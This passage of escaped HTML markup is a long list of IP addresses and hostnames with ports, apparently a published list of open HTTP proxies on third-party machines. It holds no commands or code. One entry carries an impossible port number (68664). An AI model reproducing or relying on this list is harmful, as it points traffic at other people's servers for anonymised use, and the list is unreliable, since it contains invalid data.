204);"&gt;81.2.75.97:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;81.2.226.155:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;81.187.203.152:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;81.169.140.137:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;81.149.43.56:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;81.2.114.176:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;81.2.79.41:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;81.2.86.173:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.139.12.103:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.141.204.211:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.149.85.6:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.165.15.19:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.191.154.99:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.53.187:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.53.37:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.61.44:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.210.160.234:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.234.49.14:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.237.89.100:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.66.56.52:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.28:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.39:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;81.57.176.19:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;68.185.7.106:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;63.214.252.252:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.206.120:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.207.58:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;152.157.10.8:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.5.133.146:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.135:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.170:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.204.17:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.72.203.22:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;24.39.18.74:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.106.115.117:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.116.224.42:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.248.45.51:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;80.74.160.3:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;143.90.131.169:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.100.40.44:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;marcin90.net.autocom.pl:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.36.10.154:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.97.150.34:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;194.97.151.6:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;113.20.85.22:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.216.199.52:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;130.235.33.147:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;62.209.202.19:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.195.52.193:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;164.78.252.24:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;125.234.47.218:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.0.20.50:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;189.1.162.76:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;183.179.32.60:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;124.108.97.251:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;120.50.27.83:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.12.8.22:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.72.63.198:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.71.194.189:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.27.89.10:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;216.104.161.208:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;12.150.153.198:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.201.187.250:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;218.101.6.204:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.96.152.63:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;152.3.138.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;12.101.120.138:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.96.198.165:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;125.162.37.23:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.0.209.61:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.214.128.24:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;118.175.5.28:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.193.15.174:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.175.37.71:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;200.182.136.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;vrtcsgl01.techconcepts.co.za:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.128.216.81:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.107.99.51:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;usd.lanta-net.ru:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.130.208:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;89.159.48.239:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;63.175.119.149:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.169.214.221:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;156.17.10.52:68664&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;168.143.113.16:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;63.200.196.8:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;195.139.235.200:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.168:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.58.225.187:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.49.206:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.47.32:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.12.136:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.227.44.16:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.10.96:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.158.160.96:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.118.224.153:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.118.224.151:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.202.165.221:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;204.236.232.121:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.138.64.147:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.118.224.149:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.118.224.147:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.86.186.73:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.117.163.214:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.103.4.12:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.24.133.54:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.0.150.8:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;79.125.28.123:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.237.65.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;78.108.92.62:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;78.129.221.22:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;77.94.32.167:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;77.40.228.61:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;75.101.154.182:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;74.208.153.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;74.115.6.57:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.189.39.133:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.207.93:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;72.55.130.45:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;74.115.1.11:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.208.28.113:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.242.164.150:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;72.52.96.9:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;72.52.96.16:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;72.240.34.18:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.138.124.210:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;211.138.124.198:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.207.154:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;67.167.64.237:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.130.162.248:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;66.230.212.207:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;68.153.187.220:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;67.202.36.245:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;66.230.212.200:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;66.119.43.34:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.206.186:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;66.119.43.31:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;66.172.98.218:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.82.228.240:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.100.214.37:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.71.171.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.85.230.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.8.92.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.206.10:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.62.171.106:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.27.21.167:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.70.92.235:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;63.82.223.89:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;61.14.181.248:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.225.159.47:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;63.82.223.123:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;63.82.11.168:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;63.67.239.224:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.90.15.213:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;63.207.175.147:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;63.200.13.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;62.156.255.18:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;62.7.244.105:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;58.61.153.104:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;61.30.92.250:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;63.166.247.31:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.205.121:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.204.58:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.205.107:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.57.209.130:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.204.244:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.203.77:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.203.206:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.202.222:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.202.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.202.197:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;210.0.207.68:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;24.38.96.180:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.202.132:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.202.111:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;4.17.141.248:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;24.197.2.30:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.9.237.153:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.168.18.196:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.202.8:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;61.120.9.221:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;61.57.40.31:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;64.159.90.41:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.206.126:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;41.234.206.215:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;70.86.156.174:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;85.81.112.102:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;76.12.46.59:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.113.74.144:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.79.129.9:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.251.36.62:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.43.112.5:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.60.126.2:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.185.127.41:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.169.172.168:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.131.157.20:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.160.228.146:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.179.198.98:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.100.40.47:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.44.255.169:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.100.40.37:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.10.234.7:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.100.40.34:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.36.250.17:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.248.34.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213-153-62-110.stat.salzburg-online.at:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.4.106.164:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.241.148.85:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.241.148.125:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.126.123.16:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;206.74.120.68:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;206.47.183.210:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;206.224.254.11:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;213.208.182.171:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;206.207.51.19:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;206.204.200.109:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;205.188.101.73:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.49.108:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.28.245.187:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;205.188.100.73:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.8.86:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.8.216:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.49.80:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.49.52:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.49.88:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.49.50:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.49.26:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.49.134:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.49.104:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;212.253.8.116:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;207.126.123.24:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.185.127.34:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.62.20.211:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.234.157.13:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.237.236.110:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.175.218.67:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.160.47.56:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.158.167.98:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.121.164.68:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.12.83.5:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;221.176.88.73:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;222.124.166.12:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;220.247.245.117:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;219.142.40.82:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;219.239.110.9:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;219.238.191.96:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;219.131.196.124:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.99.67.185:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;82.194.46.191:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;208.78.101.162:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;119.147.23.196:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;148.235.159.234:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;114.30.47.10:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.214.130.142:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;204.114.12.157:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;206.204.63.42:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.59.207.140:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.62.20.217:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.239.120.158:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.209.228.43:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;202.150.74.44:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.214.131.52:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;119.245.230.164:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.251.21.105:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;110.136.189.34:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;203.209.228.45:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;158.233.14.62.static.jazztel.es:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;88.202.124.121:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.85.51.158:80&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;62.121.73.248:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;217.66.205.16:8080&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;209.8.22.246:80&lt;/span&gt;&lt;br 